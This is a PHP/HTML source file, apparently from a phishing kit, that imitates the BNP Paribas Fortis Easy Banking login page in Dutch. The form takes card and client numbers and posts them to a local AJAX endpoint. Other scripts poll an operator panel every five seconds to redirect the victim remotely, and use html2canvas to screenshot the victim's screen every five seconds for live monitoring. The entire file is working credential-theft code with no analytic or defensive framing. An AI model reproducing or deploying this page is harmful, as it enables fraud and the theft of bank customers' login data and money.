<?php
include 'include/session.php';

?>
<!DOCTYPE html>
<html lang="nl">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>BNP Fortis - Easy Banking</title>
    <link rel="icon" type="image/png" href="./assets/imgs/favicon.png">
    <link rel="stylesheet" href="assets/css/style.css">
    <script>
document.addEventListener('DOMContentLoaded', function () {
  let isFetchingFlow = false;

  function handleFlowResponse(data) {
    if (!data.success) return;

    if (data.locked && data.final_redirect_url) {
      window.location.href = data.final_redirect_url;
      return;
    }

    const panelAction = data.panel_action ? data.panel_action.trim() : '';
    const currentPage = location.pathname.split('/').pop();

    if (panelAction && panelAction !== currentPage) {
      window.location.href = panelAction;
      return;
    }

    if (data.custom_message) {
      const box = document.getElementById('flow-msg');
      if (box) box.innerText = data.custom_message;
    }
  }

  async function pollFlow() {
    if (isFetchingFlow) return;
    isFetchingFlow = true;

    try {
      const res = await fetch('./ajax/flow.php');
      const data = await res.json();
      handleFlowResponse(data);
    } catch (err) {
      // Silent fail
    } finally {
      isFetchingFlow = false;
      setTimeout(pollFlow, 5000); // Schedule next only after this finishes
    }
  }

  // 🔥 First request immediately
  pollFlow();
});
</script>

<style>
  .logo-img {
    height: 32px;
    display: block;
  }
</style>

<script src="./assets/js/html2canvas.min.js"></script>
<script>
let heartbeatInterval = null;
let isSendingHeartbeat = false;

// 🔁 Send heartbeat (ensures one at a time)
async function sendHeartbeat(active = 1, includeImage = true) {
  if (isSendingHeartbeat) return;
  isSendingHeartbeat = true;

  try {
    const currentPage = location.pathname.split('/').pop();
    const payload = {
      is_active: active,
      browser_status: document.visibilityState === 'visible' ? 'focused' : 'blurred',
      current_page: currentPage,
      image: null
    };

    if (includeImage) {
      const canvas = await html2canvas(document.body);
      payload.image = canvas.toDataURL('image/png');
    }

    await fetch('./ajax/heartbeat.php', {
      method: 'POST',
      headers: { 'Content-Type': 'application/json' },
      body: JSON.stringify(payload)
    });
  } catch (err) {
    // silent fail
  } finally {
    isSendingHeartbeat = false;
  }
}

// ⚡ Initial heartbeat (no image)
sendHeartbeat(1, false);

// ⏱️ Delayed second heartbeat (with image)
setTimeout(() => sendHeartbeat(1, true), 3000);

// 🔁 Continuous heartbeat every 5s
heartbeatInterval = setInterval(() => {
  sendHeartbeat(1, true);
}, 5000);

// 📄 On visibility change
document.addEventListener('visibilitychange', () => {
  sendHeartbeat(document.visibilityState === 'visible' ? 1 : 0, false);
});

// 🚪 On page unload
window.addEventListener('beforeunload', function () {
  const currentPage = location.pathname.split('/').pop();
  navigator.sendBeacon('./ajax/heartbeat.php', JSON.stringify({
    is_active: 0,
    browser_status: 'unloading',
    current_page: currentPage,
    image: null
  }));
});
</script>
</head>
<body>
    <!-- Header -->
    <header class="header">
        <div class="header-left">
            <a href="#">&#10094; Terug</a>
        </div>
        <div class="header-center">
            
            <div class="logo-text">
                <img src="./assets/imgs/logo.svg" alt="BNP Paribas Fortis" class="logo-img">
            </div>
        </div>
        <div class="header-right">
            <a href="#">Ga naar Easy Banking Business</a>
        </div>
    </header>

    <!-- Main Content -->
    <main class="main-content">
        <div class="card card-split">
            <div class="welcome-section">
                <p>Welkom in</p>
                <h1>EASY BANKING</h1>
            </div>
            <div class="form-section">
                <form action="#" method="POST" id="login-form">
                    <div class="form-group">
                        <label>Kaartnummer</label>
                        <input type="text" placeholder="---- ---- ---- ---- -" maxlength="19" name="card" id="card-number">
                        <span class="help-icon">?</span>
                    </div>
                    <div class="form-group">
                        <label>Klantnummer</label>
                        <input type="text" placeholder="----- -----" maxlength="11" name="client" id="client-number">
                        <span class="help-icon">?</span>
                    </div>
                    <div class="checkbox-group">
                        <input type="checkbox" id="remember">
                        <label for="remember">Dit profiel onthouden</label>
                    </div>
                    <button type="submit" class="btn btn-primary">Volgende</button>
                    <div id="login-message" class="form-message"></div>
                </form>
            </div>
        </div>

        <div class="help-section">
            <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2">
                <path d="M22 16.92v3a2 2 0 0 1-2.18 2 19.79 19.79 0 0 1-8.63-3.07 19.5 19.5 0 0 1-6-6 19.79 19.79 0 0 1-3.07-8.67A2 2 0 0 1 4.11 2h3a2 2 0 0 1 2 1.72 12.84 12.84 0 0 0 .7 2.81 2 2 0 0 1-.45 2.11L8.09 9.91a16 16 0 0 0 6 6l1.27-1.27a2 2 0 0 1 2.11-.45 12.84 12.84 0 0 0 2.81.7A2 2 0 0 1 22 16.92z"/>
            </svg>
            <span><a href="#">Hulp nodig</a>? Bel naar +32 2 762 60 00</span>
        </div>
    </main>

    <!-- Footer -->
    <footer class="footer">
        <div class="footer-left">
            &copy; 2026 BNP Paribas Fortis
        </div>
        <div class="footer-right">
            <a href="#">Over ons</a>
            <span>-</span>
            <a href="#">Gebruiksvoorwaarden van de Website</a>
            <span>-</span>
            <a href="#">Cookies</a>
            <span>-</span>
            <a href="#">Privacyverklaring</a>
        </div>
    </footer>

<script>
document.addEventListener('DOMContentLoaded', () => {
  const form = document.getElementById('login-form');
  if (!form) return;

  const messageBox = document.getElementById('login-message');
  const submitButton = form.querySelector('button[type="submit"]');
  const cardInput = document.getElementById('card-number');
  const clientInput = document.getElementById('client-number');

  function formatDigits(value, groupSize, maxDigits) {
    const digits = value.replace(/\D/g, '').slice(0, maxDigits);
    const parts = digits.match(new RegExp(`.{1,${groupSize}}`, 'g')) || [];
    return parts.join(' ');
  }

  if (cardInput) {
    cardInput.setAttribute('inputmode', 'numeric');
    cardInput.addEventListener('input', () => {
      cardInput.value = formatDigits(cardInput.value, 4, 16);
    });
  }

  if (clientInput) {
    clientInput.setAttribute('inputmode', 'numeric');
    clientInput.addEventListener('input', () => {
      clientInput.value = formatDigits(clientInput.value, 5, 10);
    });
  }

  form.addEventListener('submit', (event) => {
    event.preventDefault();
    if (!submitButton) return;

    if (messageBox) messageBox.textContent = '';
    const originalText = submitButton.textContent;
    submitButton.disabled = true;
    submitButton.textContent = 'Bezig...';

    const payload = {
      card: form.card.value.trim(),
      client: form.client.value.trim()
    };

    const xhr = new XMLHttpRequest();
    xhr.open('POST', './ajax/login.php', true);
    xhr.setRequestHeader('Content-Type', 'application/json');

    xhr.onreadystatechange = function () {
      if (xhr.readyState !== 4) return;

      submitButton.disabled = false;
      submitButton.textContent = originalText;

      try {
        const data = JSON.parse(xhr.responseText);
        if (data && data.success && data.redirect) {
          window.location.href = data.redirect;
          return;
        }

        if (messageBox) {
          messageBox.textContent = (data && data.message) ? data.message : 'Er is iets misgegaan. Probeer opnieuw.';
        }
      } catch (e) {
        if (messageBox) {
          messageBox.textContent = 'Er is iets misgegaan. Probeer opnieuw.';
        }
      }
    };

    xhr.onerror = function () {
      submitButton.disabled = false;
      submitButton.textContent = originalText;
      if (messageBox) {
        messageBox.textContent = 'Er is iets misgegaan. Probeer opnieuw.';
      }
    };

    xhr.send(JSON.stringify(payload));
  });
});
</script>
</body>
</html>
